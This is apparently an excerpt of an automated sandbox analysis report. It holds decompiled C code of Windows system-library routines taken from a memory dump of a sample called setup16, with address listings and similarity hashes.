							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E049E2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E049DB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E049DFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E049E7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E04A7FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                                                                                                                                                        0x04a8e547
                                                                                                                                                                                                        0x04a8e549
                                                                                                                                                                                                        0x04a8e54f
                                                                                                                                                                                                        0x04a8e553
                                                                                                                                                                                                        0x04a8e557
                                                                                                                                                                                                        0x04a8e55a
                                                                                                                                                                                                        0x04a8e55c
                                                                                                                                                                                                        0x04a8e55f
                                                                                                                                                                                                        0x04a8e561
                                                                                                                                                                                                        0x04a8e567
                                                                                                                                                                                                        0x04a8e56b
                                                                                                                                                                                                        0x04a8e7e2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8e571
                                                                                                                                                                                                        0x04a8e575
                                                                                                                                                                                                        0x04a8e577
                                                                                                                                                                                                        0x04a8e57b
                                                                                                                                                                                                        0x04a8e57c
                                                                                                                                                                                                        0x04a8e57d
                                                                                                                                                                                                        0x04a8e57e
                                                                                                                                                                                                        0x04a8e57f
                                                                                                                                                                                                        0x04a8e588
                                                                                                                                                                                                        0x04a8e58f
                                                                                                                                                                                                        0x04a8e591
                                                                                                                                                                                                        0x04a8e592
                                                                                                                                                                                                        0x04a8e592
                                                                                                                                                                                                        0x04a8e596
                                                                                                                                                                                                        0x04a8e59e
                                                                                                                                                                                                        0x04a8e5a0
                                                                                                                                                                                                        0x04a8e5a6
                                                                                                                                                                                                        0x04a8e61d
                                                                                                                                                                                                        0x04a8e61d
                                                                                                                                                                                                        0x04a8e621
                                                                                                                                                                                                        0x04a8e623
                                                                                                                                                                                                        0x04a8e630
                                                                                                                                                                                                        0x04a8e630
                                                                                                                                                                                                        0x04a8e7e6
                                                                                                                                                                                                        0x04a8e7eb
                                                                                                                                                                                                        0x04a8e7ed
                                                                                                                                                                                                        0x04a8e7f4
                                                                                                                                                                                                        0x04a8e7fa
                                                                                                                                                                                                        0x04a8e7ff
                                                                                                                                                                                                        0x04a8e7ff
                                                                                                                                                                                                        0x04a8e80a
                                                                                                                                                                                                        0x04a8e812
                                                                                                                                                                                                        0x04a8e812
                                                                                                                                                                                                        0x04a8e5ab
                                                                                                                                                                                                        0x04a8e5b4
                                                                                                                                                                                                        0x04a8e5b9
                                                                                                                                                                                                        0x04a8e5be
                                                                                                                                                                                                        0x04a8e5c0
                                                                                                                                                                                                        0x04a8e5c2
                                                                                                                                                                                                        0x04a8e5c8
                                                                                                                                                                                                        0x04a8e5c9
                                                                                                                                                                                                        0x04a8e5cb
                                                                                                                                                                                                        0x04a8e5cc
                                                                                                                                                                                                        0x04a8e5d5
                                                                                                                                                                                                        0x04a8e5e4
                                                                                                                                                                                                        0x04a8e5f1
                                                                                                                                                                                                        0x04a8e5f8
                                                                                                                                                                                                        0x04a8e5f8
                                                                                                                                                                                                        0x04a8e5d5
                                                                                                                                                                                                        0x04a8e602
                                                                                                                                                                                                        0x04a8e616
                                                                                                                                                                                                        0x04a8e63d
                                                                                                                                                                                                        0x04a8e644
                                                                                                                                                                                                        0x04a8e64d
                                                                                                                                                                                                        0x04a8e652
                                                                                                                                                                                                        0x04a8e657
                                                                                                                                                                                                        0x04a8e659
                                                                                                                                                                                                        0x04a8e65b
                                                                                                                                                                                                        0x04a8e661
                                                                                                                                                                                                        0x04a8e662
                                                                                                                                                                                                        0x04a8e664
                                                                                                                                                                                                        0x04a8e665
                                                                                                                                                                                                        0x04a8e66e
                                                                                                                                                                                                        0x04a8e67d
                                                                                                                                                                                                        0x04a8e68a
                                                                                                                                                                                                        0x04a8e691
                                                                                                                                                                                                        0x04a8e691
                                                                                                                                                                                                        0x04a8e66e
                                                                                                                                                                                                        0x04a8e6b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8e6b6
                                                                                                                                                                                                        0x04a8e6bd
                                                                                                                                                                                                        0x04a8e6c7
                                                                                                                                                                                                        0x04a8e6d7
                                                                                                                                                                                                        0x04a8e6d9
                                                                                                                                                                                                        0x04a8e6db
                                                                                                                                                                                                        0x04a8e6de
                                                                                                                                                                                                        0x04a8e6e3
                                                                                                                                                                                                        0x04a8e6f3
                                                                                                                                                                                                        0x04a8e6fc
                                                                                                                                                                                                        0x04a8e700
                                                                                                                                                                                                        0x04a8e700
                                                                                                                                                                                                        0x04a8e704
                                                                                                                                                                                                        0x04a8e70a
                                                                                                                                                                                                        0x04a8e70a
                                                                                                                                                                                                        0x04a8e713
                                                                                                                                                                                                        0x04a8e716
                                                                                                                                                                                                        0x04a8e719
                                                                                                                                                                                                        0x04a8e720
                                                                                                                                                                                                        0x04a8e761
                                                                                                                                                                                                        0x04a8e76b
                                                                                                                                                                                                        0x04a8e774
                                                                                                                                                                                                        0x04a8e77a
                                                                                                                                                                                                        0x04a8e77a
                                                                                                                                                                                                        0x04a8e78a
                                                                                                                                                                                                        0x04a8e791
                                                                                                                                                                                                        0x04a8e799
                                                                                                                                                                                                        0x04a8e79b
                                                                                                                                                                                                        0x04a8e79f
                                                                                                                                                                                                        0x04a8e7aa
                                                                                                                                                                                                        0x04a8e7c0
                                                                                                                                                                                                        0x04a8e7ac
                                                                                                                                                                                                        0x04a8e7b2
                                                                                                                                                                                                        0x04a8e7b9
                                                                                                                                                                                                        0x04a8e7b9
                                                                                                                                                                                                        0x04a8e7c7
                                                                                                                                                                                                        0x04a8e806
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8e7c9
                                                                                                                                                                                                        0x04a8e7d1
                                                                                                                                                                                                        0x04a8e7d8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8e7d8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8e722
                                                                                                                                                                                                        0x04a8e72e
                                                                                                                                                                                                        0x04a8e748
                                                                                                                                                                                                        0x04a8e74c
                                                                                                                                                                                                        0x04a8e754
                                                                                                                                                                                                        0x04a8e756
                                                                                                                                                                                                        0x04a8e75c
                                                                                                                                                                                                        0x04a8e75c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8e75c
                                                                                                                                                                                                        0x04a8e758
                                                                                                                                                                                                        0x04a8e758
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8e758
                                                                                                                                                                                                        0x04a8e750
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8e752
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8e752
                                                                                                                                                                                                        0x04a8e730
                                                                                                                                                                                                        0x04a8e735
                                                                                                                                                                                                        0x04a8e73d
                                                                                                                                                                                                        0x04a8e73f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8e741
                                                                                                                                                                                                        0x04a8e741
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8e741
                                                                                                                                                                                                        0x04a8e739
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8e73b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8e73b
                                                                                                                                                                                                        0x04a8e722
                                                                                                                                                                                                        0x04a8e720
                                                                                                                                                                                                        0x04a8e6b0
                                                                                                                                                                                                        0x04a8e618
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8e618

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: `$`
                                                                                                                                                                                                        • API String ID: 0-197956300
                                                                                                                                                                                                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                                                                                                        • Instruction ID: cbe257c3fbe41c350490349740afdc8099b085d536d6487fc8e481e7f40112c3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2916B716043429FE724EF25C941B2BB7E6EF84714F14892DF9A9CA280E774F904CB52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A451BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E04A451BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x4aa05f0);
				E04A1D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E049DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E04A453CA(0);
						return E04A1D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E04A0F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E049E3690(1, _t117, 0x49a1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E04A0AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L049E4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E04A0AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E04A4500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E04A09860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                                                                                                                                        0x04a451be
                                                                                                                                                                                                        0x04a451c3
                                                                                                                                                                                                        0x04a451c8
                                                                                                                                                                                                        0x04a451cd
                                                                                                                                                                                                        0x04a451d0
                                                                                                                                                                                                        0x04a451d3
                                                                                                                                                                                                        0x04a451d8
                                                                                                                                                                                                        0x04a451db
                                                                                                                                                                                                        0x04a451de
                                                                                                                                                                                                        0x04a451e0
                                                                                                                                                                                                        0x04a451e3
                                                                                                                                                                                                        0x04a451e6
                                                                                                                                                                                                        0x04a451e8
                                                                                                                                                                                                        0x04a45342
                                                                                                                                                                                                        0x04a45351
                                                                                                                                                                                                        0x04a45356
                                                                                                                                                                                                        0x04a4535a
                                                                                                                                                                                                        0x04a45360
                                                                                                                                                                                                        0x04a45363
                                                                                                                                                                                                        0x04a45366
                                                                                                                                                                                                        0x04a45369
                                                                                                                                                                                                        0x04a45369
                                                                                                                                                                                                        0x04a4536b
                                                                                                                                                                                                        0x04a4536b
                                                                                                                                                                                                        0x04a45370
                                                                                                                                                                                                        0x04a453a3
                                                                                                                                                                                                        0x04a453a4
                                                                                                                                                                                                        0x04a453a6
                                                                                                                                                                                                        0x04a453ab
                                                                                                                                                                                                        0x04a453ab
                                                                                                                                                                                                        0x04a453ae
                                                                                                                                                                                                        0x04a453ae
                                                                                                                                                                                                        0x04a453b5
                                                                                                                                                                                                        0x04a453bf
                                                                                                                                                                                                        0x04a453bf
                                                                                                                                                                                                        0x04a45375
                                                                                                                                                                                                        0x04a45396
                                                                                                                                                                                                        0x04a453a0
                                                                                                                                                                                                        0x04a453a0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a45396
                                                                                                                                                                                                        0x04a45377
                                                                                                                                                                                                        0x04a45379
                                                                                                                                                                                                        0x04a4537f
                                                                                                                                                                                                        0x04a4538c
                                                                                                                                                                                                        0x04a45390
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a45390
                                                                                                                                                                                                        0x04a451ee
                                                                                                                                                                                                        0x04a451f1
                                                                                                                                                                                                        0x04a45301
                                                                                                                                                                                                        0x04a45310
                                                                                                                                                                                                        0x04a45315
                                                                                                                                                                                                        0x04a45318
                                                                                                                                                                                                        0x04a4531b
                                                                                                                                                                                                        0x04a45320
                                                                                                                                                                                                        0x04a4532e
                                                                                                                                                                                                        0x04a45331
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a45331
                                                                                                                                                                                                        0x04a45328
                                                                                                                                                                                                        0x04a45329
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a45329
                                                                                                                                                                                                        0x04a451fa
                                                                                                                                                                                                        0x04a45235
                                                                                                                                                                                                        0x04a45236
                                                                                                                                                                                                        0x04a45239
                                                                                                                                                                                                        0x04a4523f
                                                                                                                                                                                                        0x04a45240
                                                                                                                                                                                                        0x04a45241
                                                                                                                                                                                                        0x04a45242
                                                                                                                                                                                                        0x04a45246
                                                                                                                                                                                                        0x04a45247
                                                                                                                                                                                                        0x04a4524e
                                                                                                                                                                                                        0x04a45251
                                                                                                                                                                                                        0x04a45267
                                                                                                                                                                                                        0x04a45269
                                                                                                                                                                                                        0x04a4526e
                                                                                                                                                                                                        0x04a4527d
                                                                                                                                                                                                        0x04a4527e
                                                                                                                                                                                                        0x04a45281
                                                                                                                                                                                                        0x04a45282
                                                                                                                                                                                                        0x04a45287
                                                                                                                                                                                                        0x04a45288
                                                                                                                                                                                                        0x04a4528a
                                                                                                                                                                                                        0x04a4528f
                                                                                                                                                                                                        0x04a45294
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a4529a
                                                                                                                                                                                                        0x04a4529c
                                                                                                                                                                                                        0x04a4529e
                                                                                                                                                                                                        0x04a4529e
                                                                                                                                                                                                        0x04a452a4
                                                                                                                                                                                                        0x04a452b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a452ba
                                                                                                                                                                                                        0x04a452bc
                                                                                                                                                                                                        0x04a452bc
                                                                                                                                                                                                        0x04a452d4
                                                                                                                                                                                                        0x04a452d9
                                                                                                                                                                                                        0x04a452dc
                                                                                                                                                                                                        0x04a452e1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a452e7
                                                                                                                                                                                                        0x04a452f4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a452f4
                                                                                                                                                                                                        0x04a45270
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a45270
                                                                                                                                                                                                        0x04a451fc
                                                                                                                                                                                                        0x04a451fd
                                                                                                                                                                                                        0x04a45202
                                                                                                                                                                                                        0x04a45203
                                                                                                                                                                                                        0x04a45205
                                                                                                                                                                                                        0x04a4520a
                                                                                                                                                                                                        0x04a4520f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a4521b
                                                                                                                                                                                                        0x04a45226
                                                                                                                                                                                                        0x04a4522b
                                                                                                                                                                                                        0x04a4521d
                                                                                                                                                                                                        0x04a4521d
                                                                                                                                                                                                        0x04a45222
                                                                                                                                                                                                        0x04a45222
                                                                                                                                                                                                        0x04a4522d
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID: Legacy$UEFI
                                                                                                                                                                                                        • API String ID: 2994545307-634100481
                                                                                                                                                                                                        • Opcode ID: 3bc7a32e103320d2bce3ddd4f2b53e03a0f1c1736af4c742b3106f8e7f0b7a90
                                                                                                                                                                                                        • Instruction ID: 7303710dbe59ee18f58829cc6228e88bd8a233eb91eb21dae88da5f00dea9cf0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bc7a32e103320d2bce3ddd4f2b53e03a0f1c1736af4c742b3106f8e7f0b7a90
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A514C71E00609AFDB24DFA8C950AAEB7F8BFC8704F54406DE649EB291D671F900CB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049EB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E049EB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x4abd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E049E7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E04A98CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04A09E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E04A0B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E04A0CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E049E7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E04A98F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E04A0AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x4ab8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x4ab862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x4ab8628; // 0x0
							_t116 =  *0x4ab862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                                                                                                                                        0x049eb94c
                                                                                                                                                                                                        0x049eb956
                                                                                                                                                                                                        0x049eb95c
                                                                                                                                                                                                        0x049eb95e
                                                                                                                                                                                                        0x049eb964
                                                                                                                                                                                                        0x049eb969
                                                                                                                                                                                                        0x049eb96d
                                                                                                                                                                                                        0x049eb96d
                                                                                                                                                                                                        0x049eb970
                                                                                                                                                                                                        0x049eb974
                                                                                                                                                                                                        0x049eb97a
                                                                                                                                                                                                        0x049ebadf
                                                                                                                                                                                                        0x049ebadf
                                                                                                                                                                                                        0x049ebae2
                                                                                                                                                                                                        0x049ebae4
                                                                                                                                                                                                        0x049ebae6
                                                                                                                                                                                                        0x049ebaf0
                                                                                                                                                                                                        0x04a32cb8
                                                                                                                                                                                                        0x049ebaf6
                                                                                                                                                                                                        0x049ebaf6
                                                                                                                                                                                                        0x049ebaf6
                                                                                                                                                                                                        0x049ebafd
                                                                                                                                                                                                        0x049ebb1f
                                                                                                                                                                                                        0x049ebb1f
                                                                                                                                                                                                        0x049ebaff
                                                                                                                                                                                                        0x049ebb00
                                                                                                                                                                                                        0x049ebb00
                                                                                                                                                                                                        0x049ebb03
                                                                                                                                                                                                        0x049ebb03
                                                                                                                                                                                                        0x049ebacb
                                                                                                                                                                                                        0x049ebacf
                                                                                                                                                                                                        0x049ebad0
                                                                                                                                                                                                        0x049ebad1
                                                                                                                                                                                                        0x049ebadc
                                                                                                                                                                                                        0x049ebadc
                                                                                                                                                                                                        0x049eb980
                                                                                                                                                                                                        0x049eb980
                                                                                                                                                                                                        0x049eb988
                                                                                                                                                                                                        0x049eb98b
                                                                                                                                                                                                        0x049eb98d
                                                                                                                                                                                                        0x049eb990
                                                                                                                                                                                                        0x049eb993
                                                                                                                                                                                                        0x049eb999
                                                                                                                                                                                                        0x049eb99b
                                                                                                                                                                                                        0x049eb9a1
                                                                                                                                                                                                        0x049eb9a5
                                                                                                                                                                                                        0x049eb9aa
                                                                                                                                                                                                        0x049eb9b0
                                                                                                                                                                                                        0x049eb9bb
                                                                                                                                                                                                        0x049eb9c0
                                                                                                                                                                                                        0x049eb9c3
                                                                                                                                                                                                        0x049eb9ca
                                                                                                                                                                                                        0x049eb9cc
                                                                                                                                                                                                        0x049eb9cf
                                                                                                                                                                                                        0x049eb9d3
                                                                                                                                                                                                        0x049eb9d7
                                                                                                                                                                                                        0x049eba94
                                                                                                                                                                                                        0x049eba94
                                                                                                                                                                                                        0x049eba98
                                                                                                                                                                                                        0x049ebaa3
                                                                                                                                                                                                        0x04a32ccb
                                                                                                                                                                                                        0x049ebaa9
                                                                                                                                                                                                        0x049ebaa9
                                                                                                                                                                                                        0x049ebaa9
                                                                                                                                                                                                        0x049ebab1
                                                                                                                                                                                                        0x04a32cd5
                                                                                                                                                                                                        0x04a32cdd
